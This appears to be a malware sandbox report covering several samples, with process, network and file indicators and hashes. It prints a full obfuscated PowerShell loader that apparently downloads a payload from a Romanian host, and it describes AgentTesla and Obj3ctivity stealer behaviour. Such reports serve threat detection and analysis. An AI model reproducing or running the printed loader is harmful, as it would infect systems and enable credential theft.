"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$graanes = 1;Function Steatolytic($Feltsengenes){$Procereal=$Feltsengenes.Length-$graanes;$Bagger='Substring';For( $Enligtstilledes=5;$Enligtstilledes -lt $Procereal;$Enligtstilledes+=6){$Uncleanlily164+=$Feltsengenes.$Bagger.Invoke( $Enligtstilledes, $graanes);}$Uncleanlily164;}function schlepper($Lamond){ . ($Vittighed) ($Lamond);}$Xenofobi=Steatolytic 'E terMUnabsoFeatuzHeteriBilinl EnkrlNeumaaPigtr/Disco5M.xop. Taxo0 .dtm Viss (Vi cuWSlu,niLineanSem.edColo,oToptywAn.ets Cham SoreoNRangeTKambr octag1 Abol0Slaae.Tughr0Dispa;wiene gypp,W TeapiSlavenGramm6 T si4Dyarc;Ab,li Strogx Boo 6Pricy4S aln;Teach Fo osromkvdv roo:C,ino1 Non.2horke1Spytk.Acc,d0Deoxi)Natur TredvGShelleLibr c rustkMarmooMonod/Indkb2Assem0Cytod1,rykk0Digit0 Fors1Ma,le0Exten1Count uftkFPer.giFejlsrNedtre.rrelfteughoGel,txPangs/.ekru1An dy2Ragou1 rape.Arres0 Se,s ';$Dingdong=Steatolytic 'QuizmUCirk sIronsedruknrunipe-Uni.pAInyokgTritiePock,ntartatAplit ';$Externalism=Steatolytic 'MorgahRe iot.ssemtRecurpFortr:acrop/ Bl,d/RotorwDetaiw.opulw Jagt.YngleeLivsvnHe.ereSquirrUnderg SubtyPrecr-OpdrtsCra ne abesrAnativSnuse.An iarEgal.oMamba/ClaviGSpotseante,nDi etf s ksoPurprrAntite Re lnChe.kiKastsnAutorg laresU,enl.Bivu,d TainwPaa.rpMidtv ';$Underbeak=Steatolytic 'aw le>Veder ';$Vittighed=Steatolytic 'overaiDistre,omanxSc,th ';$Bibeholdelsernes='Skolelreren';$Klediskenes = Steatolytic '.etapeGartncrhinsh HjdeoFaris Mult%,orbiaKababpSpottpSpathdconchaScofft Mu iaP eud%fort.\ StilMSrsk a BlgegFuelstPerisknut,aa CrypmNonstpPeasaeAmerinOvoges Fi.m. AlleBH,rseiThi,tbMids. Besv & Kede&Mohik StabeeUnnumc IrrehApopho Regl BikortUpway ';schlepper (Steatolytic 'Gifte$MylohgLoghelPolteovizorbSki maOpercl Bams:Fet.cSTyperq AbseuConnea Homim Avan=H ndy(DupskcInd.mmR dredInte perig/ R cicBr.ss Se.ge$DiffeKFagl.lFrosteTopf dUnreai R susUnderk HuggeRejecn repreUnc rs,rgan) Empo ');schlepper (Steatolytic 'Rdgr,$Ab,trgMgbunl KomtoFiskebgravlaCarmel Indl: GlosCUrsoluSiouxrMestraStilttM scei lottcBouga2 Topn3Dia,o2 Bram=Ecdys$sv.psEMyr,ex BeritPre,geAnsigrCa lenI,peta.orrelAndetiHenvesPytonmMono..EnshasAntagp spedlUdtydiOverptStu p(Elapi$HeterUUnrewnHferhd .kskePipi.rBedlab SetieProkua NonlkFejlb)Demur ');$Externalism=$Curatic232[0];$Coenenchym= (Steatolytic 'Fiske$Pol,cgskadelEloigo Fiskb P,liaIs,aml Vrdi:DiskeTNedslhSca ieBoehmr,lowheFattib.otizyale t=SuperNBiklaeTreatwTropi-VidenONontebenth jGennee GenncbefoltEta.r EfterSGavlhyVandks GunltL.xineLik,imAndel.InopeNKotoweS.ppotPosta.So,teW IsoceGrandbSupp,CFor al,lassi .miteundernBor.rt');$Coenenchym+=$Squam[1];schlepper ($Coenenchym);schlepper (Steatolytic ' ondo$InvenTVehefh udeneTur.erPsycheWithobOstomyMa,tr.scariH PhyteUnbeaaPatted KofieHydrorPsychsprota[Briar$AlloxDImpl i TrionLysn,gobligdDarnso Tou nAvifagAntic]Damga= etag$SekteXErbiue TabunIllibouroenfH,poto BrdebBl,nniRaci, ');$Pedicellated159=Steatolytic 'Skrmf$ andTPreaghSkurke Fal.r nemoeStipubArbejy Unav. PsycDsemisoProblwJertfnS ddel Stifo Udsia,eridd armhF MyosiElsinlA.tage Ef e(Presc$Hu.riEfejlbxContrt ShyleHe errO letn RealaPosselSilkei Ne,fsRekvimMidwe,Seko,$SteepS Vi,lpEndopiRek,lr Re,siBe,tytR arhuDyrskaRetablNo maiMasc.sNondymAdv neThore)tinge ';$Spiritualisme=$Squam[0];schlepper (Steatolytic 'kursu$Resulg F.gelUnsphoDigitbUnchraArbejlSpad,:Le.onbVildsr Emunn Capie Truss Benzi amshkAadkorMarkeivarslnUndergAcupue Aut,rUbnhrsGutli=w ndf(Allo,T KonteBuk esLgesttFinge-skidtP.udgeaTeksttTermihMal r Lydse$ReparSA,onnpVidneiRegisrUnd,liPadout Na buMultia turdl OveriCar isStenkm.ordyeIntri)Serbo ');while (!$brnesikringers) {schlepper (Steatolytic 'hospi$Dr.kngMedlilVicksoPladsbkv tuaPakkelReass: atwaVTrut.aAntigrgangee AnaldScop e Forek Rekll insuaArticrBrefre Rubbrfng,eeCobbltForma=Delin$Undert Mis,r Fedtu Lokae Udfo ') ;schlepper $Pedicellated159;schlepper (Steatolytic 'In drSRek at Ved.a .ndlr OdietNewsb-C,labSUdsanlJagtgeChurle.natopChrys onyun4Ungar ');schlepper (Steatolytic 'Hu,dr$Trio.g HeadlUniveoBu heb S.lea Hovelaustr: A,phbCeratrtheolnAtla e OutbsSawb iCampakTark,rSemiciEncrynPokingHybrieLindrrEndots vrms=Nulst( BeskT VolueReg,esPaa,gt Bemo-AneroP FyrsaPhan.tg idehGevan Overs$KnudeSK mmepatmosiTaraxrSewariForsktakvaruSettoaIlluslBes,riSwiwesForammNe,coe Eve.)Ti ba ') ;schlepper (Steatolytic 'Cry,t$Vehefg S mil viceoSplitbGentlaContol.ikle:Lea hSBoligaMletstUnbela rivanHavebi Lu.usGr ene Wa s4Frisk6End c=Li do$,orttgMve,rl Spe oSydhabopdaga.denolbelgn:trundAA.tiedGe.neoLegetpPosnitAntiaa In.enPeroxtSotree M larPro,usPreva+missi+ B tt%Ku an$PeculCGena,uKlni,rSu,cea,utiltUnraniUdhvncVse t2Ge,ni3Una n2Progr.S inncUltraoTikrou Aemin Unfit Pore ') ;$Externalism=$Curatic232[$Satanise46];}$Fangerne115=311650;$Uomtvisteligheds=29747;schlepper (Steatolytic 'R mot$overrgFril.lAccumoSubchbForbiaRebe l Conc:brakvL Mis aRewets S.bct Sheve.mblyeElephv R ssnP ojee resasU eal Forda= Si k PeploG Roste CytotYarne-Th.spCErhveoSte.gnB.vaatMajbreKorrin Box,t Mis, H per$ServiS vandp Bas.iLuddir BlaniHnsehtFr lauOver,aH,urel.mpaliVanrysbran mCardieK ntr ');schlepper (Steatolytic 'P ran$Zy,otgScabblBeaucovaterbBundpaDi talKva,r:SarcoB JubheSlgtss,lumevLiviaiLobatmSkylde StaglSpasmsAculeeD fenrAppernMat.reFourqsTeuto lsr,v=Rasal Epita[ KrseSblirry ilssFe.lhtStetie G usmKirtl. epi.CRespioRdkaanTiaarvSansee bdigrwoo.htPens,]Prefa:U.raa:O onnFEfte rCostmoOeretmBes.fBAugusaChlorsBal,ieDioti6Paask4Ch.ssSM,cketOlympr s opiHjlp nForurg Acco( Pol.$Sj,skL Gruna MgfasFlgett BraneHovedeSekt v illenUnelaeeuropsTypon)s.ept ');schlepper (Steatolytic 'Ln um$ thyrgFontnl.lfbjoFran bTerr.aSportlNumer:Unde,B .verrDefacuSprinnForels No,atE.uats Enke Vaing=udsky Chlam[QuiddSInterySkolisD.velt ,ksee .yncmKleri.,abulT Svider,visxPuncttKlods.NemerED mstnReunicArbejoQuizddBoeo.i Peain Jyllgunque]Mitvo: Cook:SikkeA L,diSAnlbeCHudd IKatniIAlim .Sk,abG craceEnfratAl.unSReb.lt muz.r Hapli NonsnQuippgOutwi(Al.oi$.pfinBFortreFrag sV,rguvMonetiZap emCon teHovm l wordsFejlve ersrLasednDrmmeeSmrkesHisp,)Pat.i ');schlepper (Steatolytic ' Danc$ Crusg.ragelXylofo Te,rbsch,haPeritlAnari:Rad.oAFladerS.ytsbKi oreIncomjD,pind FitzsVa,mef EfteeJord.lConv tFremtePa,sarElber=ned.a$ StifBUdbygrPlaceuSunsmnphlo sC erctUdvlgsOrbit.pebblsUd kuuMlejebTem,usStockt AmilrHnsegiGall,nStan,gRefug(Jinji$Pais,FEightaMisfon.ummegC,rtie UnsorPendlnKer he e ra1L nge1Aflaa5Siksa, D,ti$ScorcUEleuto .nspmBrygmtRi,sfvU imeiMyldrsBechatdi areStililSkr.aiMe.afg .uenhAfpreeThreadUnjags Plan)Efter ');schlepper $Arbejdsfelter;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Magtkampens.Bib && echo t"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 71.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 www.energy-serv.ro udp
RO 109.205.90.147:80 www.energy-serv.ro tcp
US 8.8.8.8:53 147.90.205.109.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 41.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 73.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

memory/1400-0-0x00007FF989033000-0x00007FF989035000-memory.dmp

memory/1400-6-0x0000027974D30000-0x0000027974D52000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4fggukgs.snw.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1400-11-0x00007FF989030000-0x00007FF989AF1000-memory.dmp

memory/1400-12-0x00007FF989030000-0x00007FF989AF1000-memory.dmp

memory/716-15-0x0000000002320000-0x0000000002356000-memory.dmp

memory/716-16-0x0000000005010000-0x0000000005638000-memory.dmp

memory/716-17-0x0000000004D80000-0x0000000004DA2000-memory.dmp

memory/716-18-0x0000000004E20000-0x0000000004E86000-memory.dmp

memory/716-19-0x0000000004F00000-0x0000000004F66000-memory.dmp

memory/716-27-0x0000000005640000-0x0000000005994000-memory.dmp

memory/716-30-0x0000000005C50000-0x0000000005C6E000-memory.dmp

memory/716-31-0x0000000005C80000-0x0000000005CCC000-memory.dmp

memory/1400-32-0x00007FF989033000-0x00007FF989035000-memory.dmp

memory/716-33-0x0000000007550000-0x0000000007BCA000-memory.dmp

memory/716-34-0x00000000061C0000-0x00000000061DA000-memory.dmp

memory/1400-35-0x00007FF989030000-0x00007FF989AF1000-memory.dmp

memory/716-36-0x0000000006F70000-0x0000000007006000-memory.dmp

memory/716-37-0x00000000062F0000-0x0000000006312000-memory.dmp

memory/716-38-0x0000000008180000-0x0000000008724000-memory.dmp

C:\Users\Admin\AppData\Roaming\Magtkampens.Bib

MD5 8dd5eb68685e339e1651cbeefd0b235f
SHA1 cef3800a21bf4b8142333629fe685d1107c1ffa5
SHA256 5cf4b171cfc0ad5166bc8be93b41bcebe53aa1c1194a054271201dcbe48c84d1
SHA512 83d40812894f1fc3d03aca47686776fc6361a1fa52fe2f11ef22c2952c6b65d7422c34b47cbd61d37e77a3048358de2ee3ffc3ab67990d15abf3ca71c8d55b97

memory/716-40-0x0000000008730000-0x000000000ABBB000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20241023-en

Max time kernel

119s

Max time network

120s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 104.21.84.67:443 paste.ee tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.22.5.218:80 www.microsoft.com tcp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

136s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A
N/A N/A C:\Windows\system32\wscript.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\bbb50d99d2286fd78099998d4b3f17e441927cfa1e3951893e7acecf77fee1d5.js

Network

Country Destination Domain Proto
US 8.8.8.8:53 paste.ee udp
US 172.67.187.200:443 paste.ee tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 200.187.67.172.in-addr.arpa udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 66.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 202.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Agenttesla family

agenttesla

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Running = "C:\\Users\\Admin\\AppData\\Roaming\\Running\\Running.exe" C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4928 set thread context of 5004 N/A C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Local\Temp\2eeedb8129877d2cff8bfca258974786448f4babb12a1e44651735e675f09ca1.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 68.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 172.67.74.152:443 api.ipify.org tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 152.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 219.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 202.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/4928-10-0x0000000003FF0000-0x0000000003FF4000-memory.dmp

memory/5004-11-0x0000000000580000-0x00000000005C2000-memory.dmp

memory/5004-12-0x000000007431E000-0x000000007431F000-memory.dmp

memory/5004-13-0x0000000005230000-0x00000000057D4000-memory.dmp

memory/5004-14-0x0000000004BF0000-0x0000000004C56000-memory.dmp

memory/5004-15-0x0000000074310000-0x0000000074AC0000-memory.dmp

memory/5004-18-0x00000000061C0000-0x0000000006210000-memory.dmp

memory/5004-19-0x00000000062B0000-0x0000000006342000-memory.dmp

memory/5004-20-0x0000000006240000-0x000000000624A000-memory.dmp

memory/5004-21-0x000000007431E000-0x000000007431F000-memory.dmp

memory/5004-22-0x0000000074310000-0x0000000074AC0000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win7-20240903-en

Max time kernel

117s

Max time network

125s

Command Line

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

Signatures

Detects Obj3ctivity Stage1

stealer
Description Indicator Process Target
N/A N/A N/A N/A

Obj3ctivity family

obj3ctivity

Obj3ctivity, PXRECVOWEIWOEI

stealer obj3ctivity

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe

"C:\Users\Admin\AppData\Local\Temp\92e0a7687dbabbecadf58d3f706e383909637c8ea4b0f49824f4c3929ff53435.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2780 -s 1472

Network

Country Destination Domain Proto
US 8.8.8.8:53 whatismyipaddressnow.co udp
US 104.21.71.78:443 whatismyipaddressnow.co tcp

Files

memory/2780-0-0x00000000749CE000-0x00000000749CF000-memory.dmp

memory/2780-1-0x00000000009F0000-0x0000000000A04000-memory.dmp

memory/2780-2-0x00000000749C0000-0x00000000750AE000-memory.dmp

memory/2780-3-0x00000000749C0000-0x00000000750AE000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-20 18:18

Reported

2024-11-20 18:20

Platform

win10v2004-20241007-en

Max time kernel

133s

Max time network

141s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\967059c927f066a79905cf5a2f99562ca72409238322098e8ac93c905e75a1af.rtf" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 66.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 89.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 2.16.34.120:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
GB 2.18.66.11:443 binaries.templates.cdn.office.net tcp
US 8.8.8.8:53 120.34.16.2.in-addr.arpa udp
US 8.8.8.8:53 11.66.18.2.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 101.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/3516-0-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-1-0x00007FF9B126D000-0x00007FF9B126E000-memory.dmp

memory/3516-3-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-2-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-5-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-4-0x00007FF971250000-0x00007FF971260000-memory.dmp

memory/3516-7-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-6-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-9-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-11-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-12-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-10-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-13-0x00007FF96F1F0000-0x00007FF96F200000-memory.dmp

memory/3516-14-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-15-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-16-0x00007FF96F1F0000-0x00007FF96F200000-memory.dmp

memory/3516-21-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-19-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-22-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-18-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-20-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-17-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-8-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

MD5 d29962abc88624befc0135579ae485ec
SHA1 e40a6458296ec6a2427bcb280572d023a9862b31
SHA256 a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866
SHA512 4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

memory/3516-40-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-41-0x00007FF9B126D000-0x00007FF9B126E000-memory.dmp

memory/3516-42-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

memory/3516-45-0x00007FF9B11D0000-0x00007FF9B13C5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TCDDE66.tmp\iso690.xsl

MD5 ff0e07eff1333cdf9fc2523d323dd654
SHA1 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4
SHA256 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5
SHA512 b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d

